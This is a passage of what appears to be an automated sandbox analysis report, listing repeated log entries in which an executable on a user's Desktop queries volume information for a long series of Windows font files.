        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
